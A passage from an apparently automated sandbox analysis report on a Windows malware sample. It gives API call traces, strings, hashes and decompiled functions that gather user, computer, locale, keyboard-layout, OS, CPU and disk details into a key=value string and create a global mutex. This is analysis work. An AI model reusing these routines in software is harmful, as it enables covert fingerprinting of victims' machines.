VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0FBC74AD
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FBC74C3
wsprintfW.USER32 ref: 0FBC74DD
RegOpenKeyExW.ADVAPI32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0FBC74FF
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,0FBC4640,?), ref: 0FBC7521
GetLastError.KERNEL32 ref: 0FBC7534
RegCloseKey.ADVAPI32(?), ref: 0FBC753D
lstrcmpiW.KERNEL32(0FBC4640,00000419), ref: 0FBC7551
wsprintfW.USER32 ref: 0FBC757E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC758D
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0FBC75AD
wsprintfW.USER32 ref: 0FBC75F6
GetNativeSystemInfo.KERNEL32(?), ref: 0FBC7605
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0FBC7616
wsprintfW.USER32 ref: 0FBC763A
ExitProcess.KERNEL32 ref: 0FBC7641
wsprintfW.USER32 ref: 0FBC7669
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0FBC76A7
VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 0FBC76BA
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0FBC76C4
GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0FBC76FE
lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBC7730
wsprintfW.USER32 ref: 0FBC7768
lstrcatW.KERNEL32(?,0000060C), ref: 0FBC777D
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0FBC7789
GetProcAddress.KERNEL32(00000000), ref: 0FBC7790
lstrlenW.KERNEL32(?), ref: 0FBC77A0
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBC77D1

Part of subcall function 0FBC7A10: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0FBC7A2D
Part of subcall function 0FBC7A10: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FBC7AA1
Part of subcall function 0FBC7A10: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FBC7AB6
Part of subcall function 0FBC7A10: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC7ACC

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FBC7828
GetDriveTypeW.KERNEL32(?), ref: 0FBC786F
lstrcatW.KERNEL32(?,?), ref: 0FBC7896
lstrcatW.KERNEL32(?,0FBD029C), ref: 0FBC78A8
lstrcatW.KERNEL32(?,0FBD0310), ref: 0FBC78B2
GetDiskFreeSpaceW.KERNEL32(?,?,0FBC4640,?,00000000), ref: 0FBC78C8
lstrlenW.KERNEL32(?,?,00000000,0FBC4640,00000000,00000000,00000000,0FBC4640,00000000), ref: 0FBC7910
wsprintfW.USER32 ref: 0FBC792A
lstrlenW.KERNEL32(?), ref: 0FBC7938
wsprintfW.USER32 ref: 0FBC794C
lstrcatW.KERNEL32(?,0FBD0330), ref: 0FBC795F
lstrcatW.KERNEL32(?,0FBD0334), ref: 0FBC796B
lstrlenW.KERNEL32(?), ref: 0FBC7986
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0FBC79A9
VirtualFree.KERNEL32(?,00000000,00008000,00000000), ref: 0FBC79D0

Strings

x86, xrefs: 0FBC765C
Itanium, xrefs: 0FBC7655
ntdll.dll, xrefs: 0FBC7784
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 0FBC73C5
ProcessorNameString, xrefs: 0FBC7711
undefined, xrefs: 0FBC73E9
RtlComputeCrc32, xrefs: 0FBC777F
Unknown, xrefs: 0FBC7663
ARM, xrefs: 0FBC764E
%I64u/, xrefs: 0FBC7924
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 0FBC75DF
Control Panel\International, xrefs: 0FBC7421
LocaleName, xrefs: 0FBC744E
WORKGROUP, xrefs: 0FBC73E1
Keyboard Layout\Preload, xrefs: 0FBC74F5
00000419, xrefs: 0FBC7549
%I64u, xrefs: 0FBC7943
?:\, xrefs: 0FBC784D
@, xrefs: 0FBC743F
Domain, xrefs: 0FBC73C0
x64, xrefs: 0FBC7647
Identifier, xrefs: 0FBC7746
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0FBC75BB
i)w, xrefs: 0FBC7551
error, xrefs: 0FBC75EE
productName, xrefs: 0FBC75B6, 0FBC75DA
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0FBC7716, 0FBC774B

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
String ID: i)w$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 153366582-3138453034
Opcode ID: e342559c9d55da90519c63d991e5396c0609ec16c20b5ce54fd58928a79e4950
Instruction ID: fa781fae306e15acc4b55f4b6e5ee64242c8a41e1d07d13a1a447a360c254935
Opcode Fuzzy Hash: e342559c9d55da90519c63d991e5396c0609ec16c20b5ce54fd58928a79e4950
Instruction Fuzzy Hash: A812B470640309BFEB219F61EC46FABBBB8FF08701F200599F641A6191EBB4A515CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6F40 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC6F40(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

0x0fbc6f44
0x0fbc6f47
0x0fbc6f58
0x0fbc6f61
0x0fbc6f69
0x0fbc6f72
0x0fbc6f7a
0x0fbc6f7a
0x0fbc6f7f
0x0fbc6f85
0x0fbc6f8d
0x0fbc6f93
0x0fbc6f9b
0x0fbc6f9b
0x0fbc6fa1
0x0fbc6fa7
0x0fbc6faf
0x0fbc6fb5
0x0fbc6fbd
0x0fbc6fbd
0x0fbc6fc3
0x0fbc6fc9
0x0fbc6fd1
0x0fbc6fd7
0x0fbc6fdf
0x0fbc6fdf
0x0fbc6fe5
0x0fbc6feb
0x0fbc6ff3
0x0fbc6ff9
0x0fbc7001
0x0fbc7001
0x0fbc7007
0x0fbc700d
0x0fbc7015
0x0fbc701b
0x0fbc7023
0x0fbc7023
0x0fbc7029
0x0fbc702f
0x0fbc7037
0x0fbc703d
0x0fbc7045
0x0fbc7045
0x0fbc704b
0x0fbc7051
0x0fbc7059
0x0fbc705f
0x0fbc7067
0x0fbc7067
0x0fbc706d
0x0fbc7073
0x0fbc707b
0x0fbc7081
0x0fbc7089
0x0fbc7089
0x0fbc708f
0x0fbc709c
0x0fbc70a2
0x0fbc70a5
0x0fbc70aa
0x0fbc70c7
0x0fbc70ac
0x0fbc70b6
0x0fbc70bc
0x0fbc70d4
0x0fbc70dc
0x0fbc70e2
0x0fbc70ea
0x0fbc70f6
0x0fbc70f6
0x0fbc7100
0x0fbc7106
0x0fbc710e
0x0fbc7114
0x0fbc711c
0x0fbc711c
0x0fbc7128
0x0fbc7132

APIs

lstrcatW.KERNEL32(?,?), ref: 0FBC6F61
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC6F69
lstrcatW.KERNEL32(?,?), ref: 0FBC6F72
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC6F7A
lstrcatW.KERNEL32(?,?), ref: 0FBC6F85
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC6F8D
lstrcatW.KERNEL32(?,?), ref: 0FBC6F93
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC6F9B
lstrcatW.KERNEL32(?,?), ref: 0FBC6FA7
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC6FAF
lstrcatW.KERNEL32(?,?), ref: 0FBC6FB5
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC6FBD
lstrcatW.KERNEL32(?,?), ref: 0FBC6FC9
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC6FD1
lstrcatW.KERNEL32(?,?), ref: 0FBC6FD7
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC6FDF
lstrcatW.KERNEL32(?,?), ref: 0FBC6FEB
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC6FF3
lstrcatW.KERNEL32(?,?), ref: 0FBC6FF9
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC7001
lstrcatW.KERNEL32(?,?), ref: 0FBC700D
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC7015
lstrcatW.KERNEL32(?,?), ref: 0FBC701B
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC7023
lstrcatW.KERNEL32(?,0FBC4966), ref: 0FBC702F
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC7037
lstrcatW.KERNEL32(?,?), ref: 0FBC703D
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC7045
lstrcatW.KERNEL32(?,?), ref: 0FBC7051
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC7059
lstrcatW.KERNEL32(?,?), ref: 0FBC705F
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC7067
lstrcatW.KERNEL32(?,?), ref: 0FBC7073
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC707B
lstrcatW.KERNEL32(?,?), ref: 0FBC7081
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC7089
VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0FBC4699,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0FBC709C
wsprintfW.USER32 ref: 0FBC70B6
wsprintfW.USER32 ref: 0FBC70C7
lstrcatW.KERNEL32(?,?), ref: 0FBC70D4
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC70DC
lstrcatW.KERNEL32(?,?), ref: 0FBC70E2
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC70EA
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FBC70F6
lstrcatW.KERNEL32(?,?), ref: 0FBC7106
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC710E
lstrcatW.KERNEL32(?,?), ref: 0FBC7114
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC711C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,0FBC4699,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC711F

Strings

undefined, xrefs: 0FBC70C1
%x%x, xrefs: 0FBC70B0

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: 647427714268c25063c1a6edb99e75e3cc5ce6a6f4574056cf32fba016634049
Instruction ID: 13b0dc8edbd2f34a2050a5a9bd6b65d1ea218a39c7fc89af0956e4901e87376e
Opcode Fuzzy Hash: 647427714268c25063c1a6edb99e75e3cc5ce6a6f4574056cf32fba016634049
Instruction Fuzzy Hash: 7E515F31146658B6DB233F619C49FEF3B1AEFC6701F0200D8FA14240668B699156DFFA

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC4600 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83
stringmemorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0FBC39F0: GetProcessHeap.KERNEL32(?,?,0FBC4637,00000000,?,00000000,00000000), ref: 0FBC3A8C

Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FBC7357
Part of subcall function 0FBC7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0FBC7368
Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FBC7386
Part of subcall function 0FBC7330: GetComputerNameW.KERNEL32 ref: 0FBC7390
Part of subcall function 0FBC7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBC73B0
Part of subcall function 0FBC7330: wsprintfW.USER32 ref: 0FBC73F1
Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBC740E
Part of subcall function 0FBC7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBC7432
Part of subcall function 0FBC7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0FBC4640,?), ref: 0FBC7456
Part of subcall function 0FBC7330: RegCloseKey.ADVAPI32(00000000), ref: 0FBC7472

Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7192
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC719D
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71B3
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71BE
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71D4
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71DF
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71F5
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(0FBC4966,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7200
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7216
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7221
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7237
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7242
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7261
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC726C

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC465C
lstrcpyW.KERNEL32 ref: 0FBC467F
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC4686
CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC469E
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC46AA
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC46B1
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC46CB

Strings

Global\, xrefs: 0FBC4679

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: a2f29ac2965db35b2224ff8d89c5b0f019ad91ca8e0b39c69de8bb4dc89b2278
Instruction ID: c1d82aeb523b13abf7da58bb99bf4cd5d6aabd170bc6fc115b0cb7efd7ad4e0e
Opcode Fuzzy Hash: a2f29ac2965db35b2224ff8d89c5b0f019ad91ca8e0b39c69de8bb4dc89b2278
Instruction Fuzzy Hash: DC212330650315ABE224A725EC5AFBB765CDB40B51F5002BCFA05670C5AED87A058EE9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC7C10 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC7C10(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

0x0fbc7c11
0x0fbc7c1d
0x0fbc7c29
0x0fbc7c29
0x0fbc7c2f
0x0fbc7c3b
0x0fbc7c3b
0x0fbc7c41
0x0fbc7c4d
0x0fbc7c4d
0x0fbc7c53
0x0fbc7c5f
0x0fbc7c5f
0x0fbc7c65
0x0fbc7c71
0x0fbc7c71
0x0fbc7c77
0x0fbc7c83
0x0fbc7c83
0x0fbc7c89
0x0fbc7c95
0x0fbc7c95
0x0fbc7c9b
0x0fbc7ca7
0x0fbc7ca7
0x0fbc7cad
0x0fbc7cb9
0x0fbc7cb9
0x0fbc7cc2
0x00000000
0x0fbc7cd1
0x0fbc7cd5

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C29
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C3B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C4D
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C5F
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C71
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C83
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C95
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7CA7
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7CB9
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7CD1

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 28a4d0918f99e6a0de83c3b78d0c3d58e9e5baceb8ae1d5ce61e4044b8447b88
Instruction ID: 86523af84eb945346816e49c51e4ae22d984aa4fc771410c299b0050cece15c0
Opcode Fuzzy Hash: 28a4d0918f99e6a0de83c3b78d0c3d58e9e5baceb8ae1d5ce61e4044b8447b88
Instruction Fuzzy Hash: F321DD30240B05AAE7766A15ED0AFA7B7A1FB40B05F75486CE3C1248F18BF57499DF48

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC72B0 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC72B0(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x0fbc72c6
0x0fbc72d0
0x0fbc7324
0x0fbc72d2
0x0fbc72d5
0x0fbc72e7
0x0fbc72ef
0x0fbc7306
0x0fbc730f
0x0fbc731b
0x0fbc72f1
0x0fbc72f4
0x0fbc72f7
0x0fbc7303
0x0fbc7303
0x0fbc72ef

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,0000060C,?,0FBC7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBC72C6
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000080,?,?,0FBC7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBC72E7
RegCloseKey.KERNELBASE(?,?,0FBC7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBC72F7
GetLastError.KERNEL32(?,0FBC7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBC7306
RegCloseKey.ADVAPI32(?,?,0FBC7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBC730F

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
